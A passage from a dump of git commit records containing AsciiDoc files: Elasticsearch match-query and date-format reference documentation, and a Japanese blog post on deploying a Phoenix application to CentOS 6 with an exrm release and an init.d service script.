`HH:mm:ss.SSSZZ`.\n\n`time_no_millis` or `strict_time_no_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and time zone offset: `HH:mm:ssZZ`.\n\n`t_time` or `strict_t_time`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, three digit fraction of second, and time zone\n offset prefixed by 'T': `'T'HH:mm:ss.SSSZZ`.\n\n`t_time_no_millis` or `strict_t_time_no_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and time zone offset prefixed by 'T': `'T'HH:mm:ssZZ`.\n\n`week_date` or `strict_week_date`::\n\n A formatter for a full date as four digit weekyear, two digit week of\n weekyear, and one digit day of week: `xxxx-'W'ww-e`.\n\n`week_date_time` or `strict_week_date_time`::\n\n A formatter that combines a full weekyear date and time, separated by a\n 'T': `xxxx-'W'ww-e'T'HH:mm:ss.SSSZZ`.\n\n`week_date_time_no_millis` or `strict_week_date_time_no_millis`::\n\n A formatter that combines a full weekyear date and time without millis,\n separated by a 'T': `xxxx-'W'ww-e'T'HH:mm:ssZZ`.\n\n`weekyear` or `strict_weekyear`::\n\n A formatter for a four digit weekyear.\n\n`weekyear_week` or `strict_weekyear_week`::\n\n A formatter for a four digit weekyear and two digit week of weekyear.\n\n`weekyear_week_day` or `strict_weekyear_week_day`::\n\n A formatter for a four digit weekyear, two digit week of weekyear, and one\n digit day of week.\n\n`year` or `strict_year`::\n\n A formatter for a four digit year.\n\n`year_month` or `strict_year_month`::\n\n A formatter for a four digit year and two digit month of year.\n\n`year_month_day` or `strict_year_month_day`::\n\n A formatter for a four digit year, two digit month of year, and two digit\n day of month.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d1db91245792400ac999825957de8f7536b285a","subject":"Document restrictions on fuzzy matching when using synonyms (#40783)","message":"Document restrictions on fuzzy matching when using synonyms (#40783)\n\nRelates to #25518 #41592\n","repos":"vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/query-dsl\/match-query.asciidoc","new_file":"docs\/reference\/query-dsl\/match-query.asciidoc","new_contents":"[[query-dsl-match-query]]\n=== Match Query\n\n\n`match` queries accept text\/numerics\/dates, analyzes\nthem, and constructs a query. For example:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : \"this is a test\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nNote, `message` is the name of a field, you can substitute the name of\nany field instead.\n\n[[query-dsl-match-query-boolean]]\n==== match\n\nThe `match` query is of type `boolean`. It means that the text\nprovided is analyzed and the analysis process constructs a boolean query\nfrom the provided text. The `operator` flag can be set to `or` or `and`\nto control the boolean clauses (defaults to `or`). The minimum number of\noptional `should` clauses to match can be set using the\n<<query-dsl-minimum-should-match,`minimum_should_match`>>\nparameter.\n\nHere is an example when providing additional parameters (note the slight\nchange in structure, `message` is the field name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a test\",\n \"operator\" : \"and\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `analyzer` can be set to control which analyzer will perform the\nanalysis process on the text. It defaults to the field explicit mapping\ndefinition, or the default search analyzer.\n\nThe `lenient` parameter can be set to `true` to ignore exceptions caused by\ndata-type mismatches, such as trying to query a numeric field with a text\nquery string. Defaults to `false`.\n\n[[query-dsl-match-query-fuzziness]]\n===== Fuzziness\n\n`fuzziness` allows _fuzzy matching_ based on the type of field being queried.\nSee <<fuzziness>> for allowed settings.\n\nThe `prefix_length` and\n`max_expansions` can be set in this case to control the fuzzy process.\nIf the fuzzy option is set the query will use `top_terms_blended_freqs_${max_expansions}`\nas its <<query-dsl-multi-term-rewrite,rewrite\nmethod>> the `fuzzy_rewrite` parameter allows to control how the query will get\nrewritten.\n\nFuzzy transpositions (`ab` -> `ba`) are allowed by default but can be disabled\nby setting `fuzzy_transpositions` to `false`.\n\nNote that fuzzy matching is not applied to terms with synonyms, as under the hood\nthese terms are expanded to a special synonym query that blends term frequencies,\nwhich does not support fuzzy expansion.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a testt\",\n \"fuzziness\": \"AUTO\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[[query-dsl-match-query-zero]]\n===== Zero terms query\nIf the analyzer used removes all tokens in a query like a `stop` filter\ndoes, the default behavior is to match no documents at all. In order to\nchange that the `zero_terms_query` option can be used, which accepts\n`none` (default) and `all` which corresponds to a `match_all` query.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"to be or not to be\",\n \"operator\" : \"and\",\n \"zero_terms_query\": \"all\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[[query-dsl-match-query-cutoff]]\n===== Cutoff frequency\n\nThe match query supports a `cutoff_frequency` that allows\nspecifying an absolute or relative document frequency where high\nfrequency terms are moved into an optional subquery and are only scored\nif one of the low frequency (below the cutoff) terms in the case of an\n`or` operator or all of the low frequency terms in the case of an `and`\noperator match.\n\nThis query allows handling `stopwords` dynamically at runtime, is domain\nindependent and doesn't require a stopword file. It prevents scoring \/\niterating high frequency terms and only takes the terms into account if a\nmore significant \/ lower frequency term matches a document. Yet, if all\nof the query terms are above the given `cutoff_frequency` the query is\nautomatically transformed into a pure conjunction (`and`) query to\nensure fast execution.\n\nThe `cutoff_frequency` can either be relative to the total number of\ndocuments if in the range `[0..1)` or absolute if greater or equal to\n`1.0`.\n\nHere is an example showing a query composed of stopwords exclusively:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"to be or not to be\",\n \"cutoff_frequency\" : 0.001\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIMPORTANT: The `cutoff_frequency` option operates on a per-shard-level. This means\nthat when trying it out on test indexes with low document numbers you\nshould follow the advice in {defguide}\/relevance-is-broken.html[Relevance is broken].\n\n[[query-dsl-match-query-synonyms]]\n===== Synonyms\n\nThe `match` query supports multi-terms synonym expansion with the <<analysis-synonym-graph-tokenfilter,\nsynonym_graph>> token filter. When this filter is used, the parser creates a phrase query for each multi-terms synonyms.\nFor example, the following synonym: `\"ny, new york\" would produce:`\n\n`(ny OR (\"new york\"))`\n\nIt is also possible to match multi terms synonyms with conjunctions instead:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\": {\n \"query\" : \"ny city\",\n \"auto_generate_synonyms_phrase_query\" : false\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe example above creates a boolean query:\n\n`(ny OR (new AND york)) city`\n\nthat matches documents with the term `ny` or the conjunction `new AND york`.\nBy default the parameter `auto_generate_synonyms_phrase_query` is set to `true`.\n\n\n.Comparison to query_string \/ field\n**************************************************\n\nThe match family of queries does not go through a \"query parsing\"\nprocess. It does not support field name prefixes, wildcard characters,\nor other \"advanced\" features. For this reason, chances of it failing are\nvery small \/ non existent, and it provides an excellent behavior when it\ncomes to just analyze and run that text as a query behavior (which is\nusually what a text search box does). Also, the `phrase_prefix` type can\nprovide a great \"as you type\" behavior to automatically load search\nresults.\n\n**************************************************\n","old_contents":"[[query-dsl-match-query]]\n=== Match Query\n\n\n`match` queries accept text\/numerics\/dates, analyzes\nthem, and constructs a query. For example:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : \"this is a test\"\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nNote, `message` is the name of a field, you can substitute the name of\nany field instead.\n\n[[query-dsl-match-query-boolean]]\n==== match\n\nThe `match` query is of type `boolean`. It means that the text\nprovided is analyzed and the analysis process constructs a boolean query\nfrom the provided text. The `operator` flag can be set to `or` or `and`\nto control the boolean clauses (defaults to `or`). The minimum number of\noptional `should` clauses to match can be set using the\n<<query-dsl-minimum-should-match,`minimum_should_match`>>\nparameter.\n\nHere is an example when providing additional parameters (note the slight\nchange in structure, `message` is the field name):\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a test\",\n \"operator\" : \"and\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `analyzer` can be set to control which analyzer will perform the\nanalysis process on the text. It defaults to the field explicit mapping\ndefinition, or the default search analyzer.\n\nThe `lenient` parameter can be set to `true` to ignore exceptions caused by\ndata-type mismatches, such as trying to query a numeric field with a text\nquery string. Defaults to `false`.\n\n[[query-dsl-match-query-fuzziness]]\n===== Fuzziness\n\n`fuzziness` allows _fuzzy matching_ based on the type of field being queried.\nSee <<fuzziness>> for allowed settings.\n\nThe `prefix_length` and\n`max_expansions` can be set in this case to control the fuzzy process.\nIf the fuzzy option is set the query will use `top_terms_blended_freqs_${max_expansions}`\nas its <<query-dsl-multi-term-rewrite,rewrite\nmethod>> the `fuzzy_rewrite` parameter allows to control how the query will get\nrewritten.\n\nFuzzy transpositions (`ab` -> `ba`) are allowed by default but can be disabled\nby setting `fuzzy_transpositions` to `false`.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"this is a testt\",\n \"fuzziness\": \"AUTO\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[[query-dsl-match-query-zero]]\n===== Zero terms query\nIf the analyzer used removes all tokens in a query like a `stop` filter\ndoes, the default behavior is to match no documents at all. In order to\nchange that the `zero_terms_query` option can be used, which accepts\n`none` (default) and `all` which corresponds to a `match_all` query.\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"to be or not to be\",\n \"operator\" : \"and\",\n \"zero_terms_query\": \"all\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n[[query-dsl-match-query-cutoff]]\n===== Cutoff frequency\n\nThe match query supports a `cutoff_frequency` that allows\nspecifying an absolute or relative document frequency where high\nfrequency terms are moved into an optional subquery and are only scored\nif one of the low frequency (below the cutoff) terms in the case of an\n`or` operator or all of the low frequency terms in the case of an `and`\noperator match.\n\nThis query allows handling `stopwords` dynamically at runtime, is domain\nindependent and doesn't require a stopword file. It prevents scoring \/\niterating high frequency terms and only takes the terms into account if a\nmore significant \/ lower frequency term matches a document. Yet, if all\nof the query terms are above the given `cutoff_frequency` the query is\nautomatically transformed into a pure conjunction (`and`) query to\nensure fast execution.\n\nThe `cutoff_frequency` can either be relative to the total number of\ndocuments if in the range `[0..1)` or absolute if greater or equal to\n`1.0`.\n\nHere is an example showing a query composed of stopwords exclusively:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\" : {\n \"query\" : \"to be or not to be\",\n \"cutoff_frequency\" : 0.001\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nIMPORTANT: The `cutoff_frequency` option operates on a per-shard-level. This means\nthat when trying it out on test indexes with low document numbers you\nshould follow the advice in {defguide}\/relevance-is-broken.html[Relevance is broken].\n\n[[query-dsl-match-query-synonyms]]\n===== Synonyms\n\nThe `match` query supports multi-terms synonym expansion with the <<analysis-synonym-graph-tokenfilter,\nsynonym_graph>> token filter. When this filter is used, the parser creates a phrase query for each multi-terms synonyms.\nFor example, the following synonym: `\"ny, new york\" would produce:`\n\n`(ny OR (\"new york\"))`\n\nIt is also possible to match multi terms synonyms with conjunctions instead:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"query\": {\n \"match\" : {\n \"message\": {\n \"query\" : \"ny city\",\n \"auto_generate_synonyms_phrase_query\" : false\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe example above creates a boolean query:\n\n`(ny OR (new AND york)) city`\n\nthat matches documents with the term `ny` or the conjunction `new AND york`.\nBy default the parameter `auto_generate_synonyms_phrase_query` is set to `true`.\n\n\n.Comparison to query_string \/ field\n**************************************************\n\nThe match family of queries does not go through a \"query parsing\"\nprocess. It does not support field name prefixes, wildcard characters,\nor other \"advanced\" features. For this reason, chances of it failing are\nvery small \/ non existent, and it provides an excellent behavior when it\ncomes to just analyze and run that text as a query behavior (which is\nusually what a text search box does). Also, the `phrase_prefix` type can\nprovide a great \"as you type\" behavior to automatically load search\nresults.\n\n**************************************************\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1226195103f56275439690fdbc1fbb7e6575beb7","subject":"Update 2015-09-09-Phoenix-CentOS-6.adoc","message":"Update 2015-09-09-Phoenix-CentOS-6.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-09-09-Phoenix-CentOS-6.adoc","new_file":"_posts\/2015-09-09-Phoenix-CentOS-6.adoc","new_contents":"= Phoenix \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092 CentOS 6 \u3078\u30c7\u30d7\u30ed\u30a4\u3059\u308b\n\n:hp-tags: elixir, phoenix\n\n## \u306f\u3058\u3081\u306b\n\nPhoenix \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092 \u672c\u904b\u7528\u30b5\u30fc\u30d0\u30fc(CentOS 6) \u3078\u30c7\u30d7\u30ed\u30a4\u3059\u308b\u65b9\u6cd5\u306e\u8aac\u660e\u3092\u3057\u307e\u3059\u3002\u307e\u3060\u3001\u30d9\u30b9\u30c8\u3067\u306f\u306a\u3044\u3067\u3059\u3057\u3001\u4eca\u5f8c\u3082 Phoenix \u5074\u306b\u3082\u5909\u66f4\u304c\u3042\u308b\u304b\u3068\u601d\u3044\u307e\u3059\u3002Phoenix 1.0.2, Elixir 1.0.5 \u73fe\u5728\u3067\u306e\u65b9\u6cd5\u3068\u3054\u7406\u89e3\u304f\u3060\u3055\u3044\u3002\n\n\u307e\u305f\u3001Cowboy \u3067\u7acb\u3061\u4e0a\u3052\u308b\u307e\u3067\u306e\u89e3\u8aac\u3067\u3001\u672c\u6765\u306a\u3089 Nginx \u306a\u308a\u306b\u30ea\u30d0\u30fc\u30b9\u30d7\u30ed\u30ad\u30b7\u3067\u63a5\u7d9a\u3059\u308b\u306e\u3067\u3059\u304c\u3001\u7169\u96d1\u306b\u306a\u308b\u306e\u3067\u7701\u7565\u3057\u3066\u3044\u307e\u3059\u3002\n\n\n## \u5b9f\u884c\u7528\u30e6\u30fc\u30b6\u30fc\u3092\u4f5c\u6210\u3059\u308b\u3002\n\n\u30a2\u30d7\u30ea\u5b9f\u884c\u7528\u306e\u30e6\u30fc\u30b6\u30fc\u3092 phoenix \u306b\u3057\u3066\u4f5c\u6210\u3057\u307e\u3059\u3002\u30d1\u30b9\u30ef\u30fc\u30c9\u3082\u4f5c\u6210\u3057\u307e\u3059\u3002\n```\n$ sudo useradd -m phoenix\n$ sudo passwd phoenix\n```\n\n\n## Erlang, Elixir, node.js, PostgreSQL \u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\n\nhttps:\/\/cncgl.github.io\/2015\/09\/06\/Phoenix-VPS.html[Phoenix \u3092 VPS \u3078\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b] \u3092\u53c2\u8003\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u307e\u3059\u3002\n\n\n## Phoenix \u30a2\u30d7\u30ea\u3092\u53d6\u5f97\u3059\u308b\n\n\u3053\u3053\u3067\u306f\u3001Phoenix-sample \u3092git \u3088\u308a\u53d6\u5f97\u3057\u307e\u3059\u3002\u5b9f\u884c\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306f\u3001$HOME\/git\/phoenix-sample \u3068\u3057\u307e\u3059\u3002\n\n```\n$ mkdir git\n$ cd git\n$ git clone https:\/\/github.com\/cncgl\/phoenix-sample.git\n$ cd phoenix-sample\n```\n## \u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u63a5\u7d9a\u306e\u8a2d\u5b9a\n\n\u30ea\u30ea\u30fc\u30b9\u7248\u3067\u4f7f\u7528\u3059\u308b config\/prod.secret.exs \u3092\u8a2d\u5b9a\u3059\u308b\u3002git \u30ea\u30dd\u30b8\u30c8\u30ea\u3067\u306f\u4fdd\u5b58\u3057\u306a\u3044\u306e\u3067\u65b0\u898f\u306b\u4f5c\u6210\u3057\u307e\u3059\u3002\n\u3053\u3053\u3067 secret_key_base \u306f\u9069\u5f53\u306b\u5165\u529b\u3057\u3066\u3082\u3044\u3044\u3067\u3059\u304c\u3001`` mix phoenix.gen.secret`` \u306b\u3088\u308a\u751f\u6210\u3057\u3066\u304f\u308c\u308b\u3082\u306e\u3092\u30b3\u30d4\u30da\u3059\u308c\u3070\u3088\u308a\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210\u3055\u308c\u307e\u3059\u3002\n\n```\n$cat config\/prod.secret.exs\nuse Mix.Config\n\n# In this file, we keep production configuration that\n# you likely want to automate and keep it away from\n# your version contorl system.\n\n# You can generate a new secret by running:\n# \n# mix phoenix.gen.secret\nconfig :hello_phoenix, HelloPhoenix.Endpoint,\n http: [port: 4001],\t\t\t\t\t# \u5b9f\u884c\u30dd\u30fc\u30c8\n url: [host: \"mydomain.com\"], # \u5b9f\u884c\u30db\u30b9\u30c8\n secret_key_base: \"CrL8\/FvT9RhfgYlq0DnYsPBvB2NNswRiLLYIa1Dc1\/rPUtLchuYupZ2ePDkvTV58\"\n\n# Configure your database\nconfig :hello_phoenix, HelloPhoenix.Repo,\n adapter: Ecto.Adapters.Postgres,\n username: \"postgres\",\n password: \"postgres\",\n database: \"hello_phoenix_prod\",\n pool_size: 20\n\n```\n\n\n## \u4f9d\u5b58\u30d5\u30a1\u30a4\u30eb\u306e\u53d6\u5f97\u306a\u3069\n\nPhoenix framework \u3067\u306f\u3001 http:\/\/www.phoenixframework.org\/docs\/advanced-deployment[Exrm(Elixir Release Manager)] \u306b\u3088\u308b\u30ea\u30ea\u30fc\u30b9\u30d3\u30eb\u30c9\u3092\u63a8\u5968\u3057\u3066\u3044\u307e\u3059\u3002\u30ea\u30ea\u30fc\u30b9\u4f5c\u696d\u306b\u306f https:\/\/github.com\/bitwalker\/exrm[exrm] \u30d1\u30c3\u30b1\u30fc\u30b8\u304c\u5fc5\u8981\u3067\u3059\u3002phoenix-sample \u306f\u4fee\u6b63\u3055\u308c\u3066\u3044\u308b\u306e\u3067\u3059\u304c\u3001\u305d\u308c\u4ee5\u5916\u306e\u5834\u5408\u306b\u306f mix.exs \u3092\u78ba\u8a8d\u3057\u3066\u3001deps \u306b exrm \u3092\u8ffd\u52a0\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n```\n$ cat mix.exs\n...\n(\u4e2d\u7565)\n...\ndefp deps do\n [{:phoenix, \"~> 1.0,0\"},\n {:phoenix_ecto, \"~> 1.1\"},\n {:postgrex, \">= 0.0.0\"},\n {:phoenix_html, \"~> 2.1\"},\n {:phoenix_live_reload, \"~> 1.0\", only: :dev},\n {:cowboy, \"~> 1.0\"},\n {:exrm, \"~> 0.15.3\"}]\u3000\u3000\u3000\u3000\u3000# \u8ffd\u8a18\nend\n```\n\n\n\n\nbrunch.js \u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u306a\u3044\u5834\u5408\u306f `` npm i -g brunch`` \u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n```\n$ mix deps.get --only prod # \u4f9d\u5b58\u30d5\u30a1\u30a4\u30eb\u306e\u53d6\u5f97\n$ MIX_ENV=prod mix compile # ex \u30d5\u30a1\u30a4\u30eb\u306e\u30b3\u30f3\u30d1\u30a4\u30eb\n$ brunch b -P # asset \u306e\u30d3\u30eb\u30c9\n$ MIX_ENV=prod mix phoenix.digest\n$ MIX_ENV=prod mix do ecto.create, ecto.migrate\n$ MIX_ENV=prod mix release\n```\nrelease \u306f\u5c11\u3057\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002\u7d42\u4e86\u3059\u308b\u3068 rel \u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u914d\u4e0b\u306b\u30ea\u30ea\u30fc\u30b9\u7528\u30d5\u30a1\u30a4\u30eb\u304c\u751f\u6210\u3055\u308c\u307e\u3059\u3002\u306a\u304a\u3001release \u3092\u3084\u308a\u76f4\u3059\u5834\u5408\u306f ``mix release.clean`` \u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n\n## \u30c7\u30fc\u30e2\u30f3\u3067\u5b9f\u884c\n\nCentOS 6 \u306e service \u306b\u30c7\u30fc\u30e2\u30f3\u3068\u3057\u3066\u767b\u9332\u3059\u308b\u3002Upstart \u306f CentOS6 \u306e\u3082\u306e\u304c 0.6.5 \u3068\u53e4\u304f\u3001\u30e6\u30fc\u30b6\u30fc\u3092\u5207\u308a\u66ff\u3048\u3066\u5b9f\u884c\u304c\u3067\u304d\u306a\u304b\u3063\u305f\u3081\u3001\u4fdd\u7559\u3068\u3057\u307e\u3057\u305f\u3002\u65b0\u3057\u3044 Upstart \u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u304c\u5206\u304b\u308c\u3070\u8a66\u3057\u3066\u307f\u305f\u3044\u3067\u3059\u3002\u516c\u5f0f\u3067\u306f Ubuntu \u3067\u5b9f\u884c\u3059\u308b\u305f\u3081\u306e http:\/\/www.phoenixframework.org\/docs\/advanced-deployment#section-setting-up-our-init-system[Upstart \u306e\u30b9\u30af\u30ea\u30d7\u30c8] \u304c\u516c\u958b\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n\n```\n$ cat \/etc\/init.d\/todo-phoenix\n#!\/bin\/sh\n#\n\n. \/etc\/rc.d\/init.d\/functions\n\nPROG_NAME=todo-phoenix\nUSER=phoenix\nAPP_ROOT=\/home\/phoenix\/git\/phoenix-sample\nMIX_ENV=prod\nSTART_CMD=\"rel\/hello_phoenix\/bin\/hello_phoenix start -detached\"\nSTOP_CMD=\"rel\/hello_phoenix\/bin\/hello_phoenix stop\"\n\nexport PATH=\/usr\/elixir\/bin:\/usr\/local\/bin:$PATH\ncd $APP_ROOT || exit 1\n\ncase $1 in\n start)\n echo -n $\"Starting $PROG_NAME: \"\n sudo -u phoenix $START_CMD\n ;;\n stop)\n echo -n $\"Shutting down $PROG_NAME: \"\n sudo -u phoenix $STOP_CMD\n ;;\n restart)\n echo -n $\"Restarting $PROG_NAME: \"\n sudo -u phoenix $STOP_CMD\n sudo -u phoenix $START_CMD\n ;;\n *)\n echo >&2 \"Usage: $0 <start|stop|restart>\"\n exit 1\n ;;\nesac\nexit $?\n```\n\n\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306b\u3088\u308a ``sudo service todo-phoenix start`` \u3067\u8d77\u52d5\u3057\u3001``sudo service todo-phoenix stop`` \u3067\u505c\u6b62\u3057\u307e\u3059\u3002\u3053\u3053\u3067\u6ce8\u610f\u3059\u308b\u306e\u306f\u3001\u8d77\u52d5\u6642\u306f ``hello_phoenix start -detached`` \u3068 -detached \u30aa\u30d7\u30b7\u30e7\u30f3\u3092\u4ed8\u3051\u3066\u8d77\u52d5\u3059\u308b\u3053\u3068\u3067\u3059\u3002start \u3060\u3051\u3060\u3068\u30c7\u30fc\u30e2\u30f3\u3067\u5b9f\u884c\u3057\u3066\u3082\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u51fa\u529b\u3057\u3066\u3044\u308b\u3089\u3057\u304f\u3001\u8ca0\u8377\u3092\u304b\u3051\u308b\u3068\u30e1\u30e2\u30ea\u30fc\u4e0d\u8db3\u3068\u306a\u308a\u307e\u3059\u3002\n\n\u8a73\u3057\u304f\u306f http:\/\/qiita.com\/maruware\/items\/7765837384795b1d9659[phoenix\u3067mix release\u3057\u305f\u3068\u304d\u306b\u30e1\u30e2\u30ea\u304c\u6ea2\u308c\u308b\u306e\u3092\u89e3\u6c7a - Qiita] \u3092\u53c2\u8003\u306b\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n","old_contents":"= Phoenix \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092 CentOS 6 \u3078\u30c7\u30d7\u30ed\u30a4\u3059\u308b\n\n:hp-tags: elixir, phoenix\n\n## \u306f\u3058\u3081\u306b\n\nPhoenix \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092 \u672c\u904b\u7528\u30b5\u30fc\u30d0\u30fc(CentOS 6) \u3078\u30c7\u30d7\u30ed\u30a4\u3059\u308b\u65b9\u6cd5\u306e\u8aac\u660e\u3092\u3057\u307e\u3059\u3002\u307e\u3060\u3001\u30d9\u30b9\u30c8\u3067\u306f\u306a\u3044\u3067\u3059\u3057\u3001\u4eca\u5f8c\u3082 Phoenix \u5074\u306b\u3082\u5909\u66f4\u304c\u3042\u308b\u304b\u3068\u601d\u3044\u307e\u3059\u3002Phoenix 1.0.2, Elixir 1.0.5 \u73fe\u5728\u3067\u306e\u65b9\u6cd5\u3068\u3054\u7406\u89e3\u304f\u3060\u3055\u3044\u3002\n\n\u307e\u305f\u3001Cowboy \u3067\u7acb\u3061\u4e0a\u3052\u308b\u307e\u3067\u306e\u89e3\u8aac\u3067\u3001\u672c\u6765\u306a\u3089 Nginx \u306a\u308a\u306b\u30ea\u30d0\u30fc\u30b9\u30d7\u30ed\u30ad\u30b7\u3067\u63a5\u7d9a\u3059\u308b\u306e\u3067\u3059\u304c\u3001\u7169\u96d1\u306b\u306a\u308b\u306e\u3067\u7701\u7565\u3057\u3066\u3044\u307e\u3059\u3002\n\n\n## \u5b9f\u884c\u7528\u30e6\u30fc\u30b6\u30fc\u3092\u4f5c\u6210\u3059\u308b\u3002\n\n\u30a2\u30d7\u30ea\u5b9f\u884c\u7528\u306e\u30e6\u30fc\u30b6\u30fc\u3092 phoenix \u306b\u3057\u3066\u4f5c\u6210\u3057\u307e\u3059\u3002\u30d1\u30b9\u30ef\u30fc\u30c9\u3082\u4f5c\u6210\u3057\u307e\u3059\u3002\n```\n$ sudo useradd -m phoenix\n$ sudo passwd phoenix\n```\n\n\n## Erlang, Elixir, node.js, PostgreSQL \u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\n\nhttps:\/\/cncgl.github.io\/2015\/09\/06\/Phoenix-VPS.html[Phoenix \u3092 VPS \u3078\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b] \u3092\u53c2\u8003\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u307e\u3059\u3002\n\n\n## Phoenix \u30a2\u30d7\u30ea\u3092\u53d6\u5f97\u3059\u308b\n\n\u3053\u3053\u3067\u306f\u3001Phoenix-sample \u3092git \u3088\u308a\u53d6\u5f97\u3057\u307e\u3059\u3002\u5b9f\u884c\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306f\u3001$HOME\/git\/phoenix-sample \u3068\u3057\u307e\u3059\u3002\n\n```\n$ mkdir git\n$ cd git\n$ git clone https:\/\/github.com\/cncgl\/phoenix-sample.git\n$ cd phoenix-sample\n```\n## \u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u63a5\u7d9a\u306e\u8a2d\u5b9a\n\n\u30ea\u30ea\u30fc\u30b9\u7248\u3067\u4f7f\u7528\u3059\u308b config\/prod.secret.exs \u3092\u8a2d\u5b9a\u3059\u308b\u3002git \u30ea\u30dd\u30b8\u30c8\u30ea\u3067\u306f\u4fdd\u5b58\u3057\u306a\u3044\u306e\u3067\u65b0\u898f\u306b\u4f5c\u6210\u3057\u307e\u3059\u3002\n\u3053\u3053\u3067 secret_key_base \u306f\u9069\u5f53\u306b\u5165\u529b\u3057\u3066\u3082\u3044\u3044\u3067\u3059\u304c\u3001`` mix phoenix.gen.secret`` \u306b\u3088\u308a\u751f\u6210\u3057\u3066\u304f\u308c\u308b\u3082\u306e\u3092\u30b3\u30d4\u30da\u3059\u308c\u3070\u3088\u308a\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210\u3055\u308c\u307e\u3059\u3002\n\n```\n$cat config\/prod.secret.exs\nuse Mix.Config\n\n# In this file, we keep production configuration that\n# you likely want to automate and keep it away from\n# your version contorl system.\n\n# You can generate a new secret by running:\n# \n# mix phoenix.gen.secret\nconfig :hello_phoenix, HelloPhoenix.Endpoint,\n http: [port: 4001],\t\t\t\t\t# \u5b9f\u884c\u30dd\u30fc\u30c8\n url: [host: \"mydomain.com\"], # \u5b9f\u884c\u30db\u30b9\u30c8\n secret_key_base: \"CrL8\/FvT9RhfgYlq0DnYsPBvB2NNswRiLLYIa1Dc1\/rPUtLchuYupZ2ePDkvTV58\"\n\n# Configure your database\nconfig :hello_phoenix, HelloPhoenix.Repo,\n adapter: Ecto.Adapters.Postgres,\n username: \"postgres\",\n password: \"postgres\",\n database: \"hello_phoenix_prod\",\n pool_size: 20\n\n```\n\n\n## \u4f9d\u5b58\u30d5\u30a1\u30a4\u30eb\u306e\u53d6\u5f97\u306a\u3069\n\nPhoenix framework 